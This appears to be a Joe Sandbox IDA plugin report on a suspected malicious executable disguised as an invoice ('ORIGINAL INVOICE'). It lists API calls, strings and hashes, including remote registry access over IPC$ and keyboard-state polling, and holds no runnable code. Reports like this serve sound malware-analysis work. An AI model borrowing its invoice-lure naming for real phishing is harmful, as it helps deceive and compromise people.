                                                              • API String ID: 3964851224-1088933313
                                                              • Opcode ID: dcae2dfc4487c11a5d29f5a7a9b5e9bf5c6cfb39b4157102afbd368707a7f78c
                                                              • Instruction ID: 62efeede1ce03baa75b21bbfa2eeb9357ba84d91ed84f8a9e1796684150f1f5b
                                                              • Opcode Fuzzy Hash: dcae2dfc4487c11a5d29f5a7a9b5e9bf5c6cfb39b4157102afbd368707a7f78c
                                                              • Instruction Fuzzy Hash: 3F415F3123024A8BDF04EF14D841AEA3375AF62781F515819EC551B292EBB1EE7ECB54
                                                              APIs
                                                              • _memset.LIBCMT ref: 002355D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00235664
                                                              • GetMenuItemCount.USER32(002B1708), ref: 002356ED
                                                              • DeleteMenu.USER32(002B1708,00000005,00000000,000000F5,?,?), ref: 0023577D
                                                              • DeleteMenu.USER32(002B1708,00000004,00000000), ref: 00235785
                                                              • DeleteMenu.USER32(002B1708,00000006,00000000), ref: 0023578D
                                                              • DeleteMenu.USER32(002B1708,00000003,00000000), ref: 00235795
                                                              • GetMenuItemCount.USER32(002B1708), ref: 0023579D
                                                              • SetMenuItemInfoW.USER32(002B1708,00000004,00000000,00000030), ref: 002357D3
                                                              • GetCursorPos.USER32(?), ref: 002357DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 002357E6
                                                              • TrackPopupMenuEx.USER32(002B1708,00000000,?,00000000,00000000,00000000), ref: 002357F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00235805
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 373b0f91b159f2026850ad35da44f108de83f99beef17b641e8d1af2cf6404dc
                                                              • Instruction ID: deb6f8d8bf6fd469fb2cfde8d3de574cd829b2e415a9e736fb75cc4841d73664
                                                              • Opcode Fuzzy Hash: 373b0f91b159f2026850ad35da44f108de83f99beef17b641e8d1af2cf6404dc
                                                              • Instruction Fuzzy Hash: E471D5B0660A26BBEB209F15DC4AFAABF69FF00364F540205F51C6A1E0C7B16C60DB94
                                                              APIs
                                                              • _memset.LIBCMT ref: 0022A1DC
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0022A211
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0022A22D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0022A249
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0022A273
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0022A29B
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022A2A6
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022A2AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1687751970-22481851
                                                              • Opcode ID: d10d51f475d08af44b1bb9316bc64b5a4af2f1375ca0246397666b2b943abd45
                                                              • Instruction ID: cf4f9da41b3afc5799f1ff44f6c33fee2b69e676b48b636a6ffd179ebc522529
                                                              • Opcode Fuzzy Hash: d10d51f475d08af44b1bb9316bc64b5a4af2f1375ca0246397666b2b943abd45
                                                              • Instruction Fuzzy Hash: A141E47681022DABDB11EBA4EC859EEB7B8AF14340F004169F905A3161EB74AE55CB90
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 002367FD
                                                              • __swprintf.LIBCMT ref: 0023680A
                                                                • Part of subcall function 0021172B: __woutput_l.LIBCMT ref: 00211784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00236834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00236840
                                                              • LockResource.KERNEL32(00000000), ref: 0023684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0023686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0023687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0023688E
                                                              • LockResource.KERNEL32(?), ref: 0023689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002368F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID: 5*
                                                              • API String ID: 1433390588-2646319100
                                                              • Opcode ID: 31f9c0f99584d31687b5a2b81dba4efac5a493d22aa00fdbbdcdce108a660c54
                                                              • Instruction ID: bcb3490d37c05447bcfb57828a6ca29eeb5966f740e8a8a1ca6797b3099ac5ca
                                                              • Opcode Fuzzy Hash: 31f9c0f99584d31687b5a2b81dba4efac5a493d22aa00fdbbdcdce108a660c54
                                                              • Instruction Fuzzy Hash: 9C318FB191021ABBDB109FA0ED5DABB7BBCEF08340F008425F906E2151E770D9769A60
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002636F4,00000010,?,Bad directive syntax error,0028DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002325D6
                                                              • LoadStringW.USER32(00000000,?,002636F4,00000010), ref: 002325DD
                                                              • _wprintf.LIBCMT ref: 00232610
                                                              • __swprintf.LIBCMT ref: 00232632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002326A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: 2d3e5f85655bf67a3ea07acc5fa060596b816504d45c05a4fb339f4f89838ef4
                                                              • Instruction ID: 073e40fbc5daccbd9e5c2b2e7e1340ed241cd3e56b8773d629db41d14040f180
                                                              • Opcode Fuzzy Hash: 2d3e5f85655bf67a3ea07acc5fa060596b816504d45c05a4fb339f4f89838ef4
                                                              • Instruction Fuzzy Hash: 8221487182021EAFCF11EF90CC4AEEE7B79BF29304F000455F615660A2EB71AA69DF50
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00237B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00237B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00237B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00237B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00237B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: e960b6585698c2e1955038bd3dc69ab803a76bc3a320e2323390f3ba7c486acb
                                                              • Instruction ID: 0fa1e84a73b91c2b70e7ea1ea5d338f9082914ffaea36294acc549eba45c61dc
                                                              • Opcode Fuzzy Hash: e960b6585698c2e1955038bd3dc69ab803a76bc3a320e2323390f3ba7c486acb
                                                              • Instruction Fuzzy Hash: 391182E166026D7ADB20F765CC4ADFFFABCEBE3B14F0005197512A60D1DF601A55C5A0
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00237794
                                                                • Part of subcall function 0020DC38: timeGetTime.WINMM(?,7694B400,002658AB), ref: 0020DC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 002377C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002377E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00237806
                                                              • SetActiveWindow.USER32 ref: 00237825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00237833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00237852
                                                              • Sleep.KERNEL32(000000FA), ref: 0023785D
                                                              • IsWindow.USER32 ref: 00237869
                                                              • EndDialog.USER32(00000000), ref: 0023787A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 2db18d07f937cb5679fd2ec92927ffdefb30e80966ed741a5e3f9c218a0f32ab
                                                              • Instruction ID: cff04960d488a9247102fcb3ccb854515bfd2a5a964c7ef91ee5ea37c02f4d29
                                                              • Opcode Fuzzy Hash: 2db18d07f937cb5679fd2ec92927ffdefb30e80966ed741a5e3f9c218a0f32ab
                                                              • Instruction Fuzzy Hash: D8216DF062420AAFEB209F20FC8DB267FB9FB45348F400164F50A921A2CB718C60DB64
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CoInitialize.OLE32(00000000), ref: 0024034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002403DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 002403F2
                                                              • CoCreateInstance.OLE32(0027DA8C,00000000,00000001,002A3CF8,?), ref: 0024043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002404AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00240505
                                                              • _memset.LIBCMT ref: 00240542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0024057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002405A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 002405A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002405DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 002405E1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 6506c63c48de13bfc7192c7cd0adf453b2ed27bf5fb44b0519c9cd0739f4a569
                                                              • Instruction ID: dc2eeeabb79586afd3b3fd726e843cd9ca0d4d34d4a9d7ce3440e28f7378a939
                                                              • Opcode Fuzzy Hash: 6506c63c48de13bfc7192c7cd0adf453b2ed27bf5fb44b0519c9cd0739f4a569
                                                              • Instruction Fuzzy Hash: 4CB1C875A10209AFDB14DFA4D889DAEBBB9FF48304B148499F909EB251DB70ED81CF50
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00232ED6
                                                              • SetKeyboardState.USER32(?), ref: 00232F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00232F61
                                                              • GetKeyState.USER32(000000A0), ref: 00232F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00232FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00232FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00232FE4
                                                              • GetKeyState.USER32(00000011), ref: 00232FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0023301B
                                                              • GetKeyState.USER32(00000012), ref: 00233029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00233052
                                                              • GetKeyState.USER32(0000005B), ref: 00233060
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 9f28d13da913cd2fbb87c0910dc8ab3d89839e270fe62efb3fcb467ce76c7663
                                                              • Instruction ID: 8e05e68fdf437691001aa572d8168a2bfc53dcac495e3c309eb592cb5e2ccf3e
                                                              • Opcode Fuzzy Hash: 9f28d13da913cd2fbb87c0910dc8ab3d89839e270fe62efb3fcb467ce76c7663
                                                              • Instruction Fuzzy Hash: 8E512AB0A187C569FB35EFB488017EABFF45F11340F08458EC5C25A1C2DA54AB9CCBA2
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0022ED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022ED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0022ED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 0022ED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022EDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0022EE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022EE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0022EE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0022EE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0022EE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0022EE9B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: e1b817ab0a65cddbe40fc171e15b6d6255b9d180fb7e909156a7ef688a0050a8
                                                              • Instruction ID: e808caefead9b7016195313c703146d98be33211c10a2cfc11ee33d9e42840a1
                                                              • Opcode Fuzzy Hash: e1b817ab0a65cddbe40fc171e15b6d6255b9d180fb7e909156a7ef688a0050a8
                                                              • Instruction Fuzzy Hash: 5D510171B10205AFDF18DFA9ED89AAEBBB9FF88710F158129F519D6290D7709D408B10
                                                              APIs
                                                                • Part of subcall function 0020B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0020B759,?,00000000,?,?,?,?,0020B72B,00000000,?), ref: 0020BA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0020B72B), ref: 0020B7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0020B88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0026D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D90A
                                                              • DeleteObject.GDI32(00000000), ref: 0026D91C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              APIs
                                                                • Part of subcall function 0020B526: GetWindowLongW.USER32(?,000000EB), ref: 0020B537
                                                              • GetSysColor.USER32(0000000F), ref: 0020B438
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              APIs
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              APIs
                                                              • CharLowerBuffW.USER32(0028DC00,0028DC00,0028DC00), ref: 0023D7CE
                                                              • GetDriveTypeW.KERNEL32(?,002A3A70,00000061), ref: 0023D898
                                                              • _wcscpy.LIBCMT ref: 0023D8C2
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 001F93AB
                                                              • __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 00211557: _xtow@16.LIBCMT ref: 00211578
                                                              Strings
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0025A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0025A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0025A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0025A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0025A286
                                                              • DeleteDC.GDI32(00000000), ref: 0025A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0025A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0025A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0025A2B9
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              APIs
                                                              • _memset.LIBCMT ref: 00215047
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __gmtime64_s.LIBCMT ref: 002150E0
                                                              • __gmtime64_s.LIBCMT ref: 00215116
                                                              • __gmtime64_s.LIBCMT ref: 00215133
                                                              • __allrem.LIBCMT ref: 00215189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002151A5
                                                              • __allrem.LIBCMT ref: 002151BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002151DA
                                                              • __allrem.LIBCMT ref: 002151F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0021520F
                                                              • __invoke_watson.LIBCMT ref: 00215280
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00234DF8
                                                              • GetMenuItemInfoW.USER32(002B1708,000000FF,00000000,00000030), ref: 00234E59
                                                              • SetMenuItemInfoW.USER32(002B1708,00000004,00000000,00000030), ref: 00234E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00234EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00234EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00234F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00234F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00234F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00234FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234FEB
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00259C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00259C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00259CBF
                                                              • _memset.LIBCMT ref: 00259CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00259CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00259D5A
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002294FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00229549
                                                              • VariantInit.OLEAUT32(?), ref: 0022955B
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0022957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 002295BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 002295D2
                                                              • VariantClear.OLEAUT32(?), ref: 002295E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 002295F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002295FD
                                                              • VariantClear.OLEAUT32(?), ref: 0022960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0022961A
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 10d9d8c3142efbfd72b4bceff495e232060e7aa0dd1bbf89b85cb146abc0de86
                                                              • Instruction ID: 6b689ad880e5c23464c58bd9a55a47e5f438e11fc6bc0577429281fb4cc51e3f
                                                              • Opcode Fuzzy Hash: 10d9d8c3142efbfd72b4bceff495e232060e7aa0dd1bbf89b85cb146abc0de86
                                                              • Instruction Fuzzy Hash: 2C415171E10219AFCB01EFE4E8589DEBBB9FF08354F108065E505A3251DB71EA95CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
